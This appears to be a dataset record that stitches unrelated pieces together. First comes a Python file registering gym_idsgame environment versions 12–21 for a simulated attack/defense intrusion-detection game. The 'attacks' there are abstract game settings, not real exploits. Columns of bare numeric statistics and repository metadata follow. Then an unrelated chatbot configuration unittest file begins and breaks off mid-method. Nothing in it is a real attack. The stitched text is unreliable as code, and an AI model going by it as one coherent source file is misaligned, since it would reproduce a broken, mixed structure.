# [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random),
# Vulnerability value: 0
# [Rewards] Dense
# [Version] 12
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v12',
entry_point='gym_idsgame.envs:IdsGameV12Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 13 ------------
# [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0
# [Rewards] Dense
# [Version] 13
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v13',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV13Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0
# [Rewards] Dense
# [Version] 13
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v13',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV13Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0
# [Rewards] Dense
# [Version] 13
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v13',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV13Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0
# [Rewards] Dense
# [Version] 13
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v13',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV13Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0
# [Rewards] Dense
# [Version] 13
# [Observations] fully observed
# [Attacker Starting Position] Start node
# [Environment] Deterministic
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v13',
entry_point='gym_idsgame.envs:IdsGameV13Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 14 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random defender
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 14
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v14',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV14Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 14
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v14',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV14Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random attacker
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 14
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v14',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV14Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 14
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v14',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV14Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 14
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v14',
entry_point='gym_idsgame.envs:IdsGameV14Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 15 ------------
# [AttackEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 15
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v15',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV15Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 15
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v15',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV15Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 15
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v15',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV15Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 15
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v15',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV15Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 15
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Local View] Yes
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v15',
entry_point='gym_idsgame.envs:IdsGameV15Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 16 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random defender
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 16
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v16',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV16Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 16
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v16',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV16Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random attacker
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 16
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v16',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV16Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 16
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v16',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV16Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 16
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v16',
entry_point='gym_idsgame.envs:IdsGameV16Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 17 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random defender
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 17
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v17',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV17Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 17
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v17',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV17Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random attacker
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 17
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v17',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV17Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 17
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v17',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV17Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 17
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] No
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v17',
entry_point='gym_idsgame.envs:IdsGameV17Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 18 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 18
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_defense-v18',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV18Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 18
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-minimal_defense-v18',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV18Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 18
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_attack-v18',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV18Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 18
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-maximal_attack-v18',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV18Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 18
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-v18',
entry_point='gym_idsgame.envs:IdsGameV18Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 19 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 19
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_defense-v19',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV19Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 19
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-minimal_defense-v19',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV19Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 19
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_attack-v19',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV19Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 19
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-maximal_attack-v19',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV19Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 19
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-v19',
entry_point='gym_idsgame.envs:IdsGameV19Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 20 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 20
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_defense-v20',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV20Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 20
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-minimal_defense-v20',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV20Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 20
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_attack-v20',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV20Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 20
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-maximal_attack-v20',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV20Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 20
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-v20',
entry_point='gym_idsgame.envs:IdsGameV20Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 21 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 21
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_defense-v21',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV21Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 21
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-minimal_defense-v21',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV21Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 21
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-random_attack-v21',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV21Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy"
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 21
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-maximal_attack-v21',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV21Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender
# [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1
# [Rewards] Dense
# [Version] 21
# [Observations] partially observed
# [Environment] Random
# [Attacker Starting Position] Random
# [Local View] Yes
# [Reconnaissance activities] enabled
# [Reconnaissance bool features] Yes
register(
id='idsgame-v21',
entry_point='gym_idsgame.envs:IdsGameV21Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
| 38.157565
| 135
| 0.742341
| 8,091
| 67,081
| 6.061426
| 0.027932
| 0.054075
| 0.038476
| 0.045266
| 0.945232
| 0.944559
| 0.932121
| 0.884489
| 0.884489
| 0.884489
| 0
| 0.025794
| 0.133108
| 67,081
| 1,758
| 136
| 38.157565
| 0.817564
| 0.655521
| 0
| 0.399281
| 0
| 0
| 0.515517
| 0.302813
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.001799
| 0
| 0.001799
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a1e1c138ac4a3b33d13395c9235092e94bd7ca0
| 9,637
|
py
|
Python
|
test/programytest/config/file/base_file_tests.py
|
whackur/chatbot
|
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
|
[
"MIT"
] | 2
|
2018-06-16T09:32:22.000Z
|
2019-07-21T13:16:00.000Z
|
test/programytest/config/file/base_file_tests.py
|
whackur/chatbot
|
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
|
[
"MIT"
] | 3
|
2020-07-16T04:00:42.000Z
|
2021-03-31T18:52:22.000Z
|
test/programytest/config/file/base_file_tests.py
|
whackur/chatbot
|
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
|
[
"MIT"
] | 4
|
2018-06-29T23:50:44.000Z
|
2020-11-05T08:13:47.000Z
|
import unittest
class ConfigurationBaseFileTests(unittest.TestCase):
def assert_configuration(self, configuration):
self.assertIsNotNone(configuration)
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0])
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].overrides)
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].overrides.allow_system_aiml)
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].overrides.allow_learn_aiml)
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].overrides.allow_learnf_aiml)
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].defaults)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.default_get, "test_unknown")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.default_property, "test_unknown")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.default_map, "test_unknown")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.learn_filename, "test-learnf.aiml")
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].nodes)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].nodes.pattern_nodes, "./config/test_pattern_nodes.conf")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].nodes.template_nodes, "./config/test_template_nodes.conf")
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].binaries)
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].binaries.save_binary)
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].binaries.load_binary)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].binaries.binary_filename, "/tmp/y-bot.brain")
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].binaries.load_aiml_on_binary_fail)
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].braintree)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].braintree.file, "/tmp/braintree.xml")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].braintree.content, "xml")
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files)
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.files, ["./test-aiml"])
self.assertIsNone(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.file)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.extension, ".test-aiml")
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.directories)
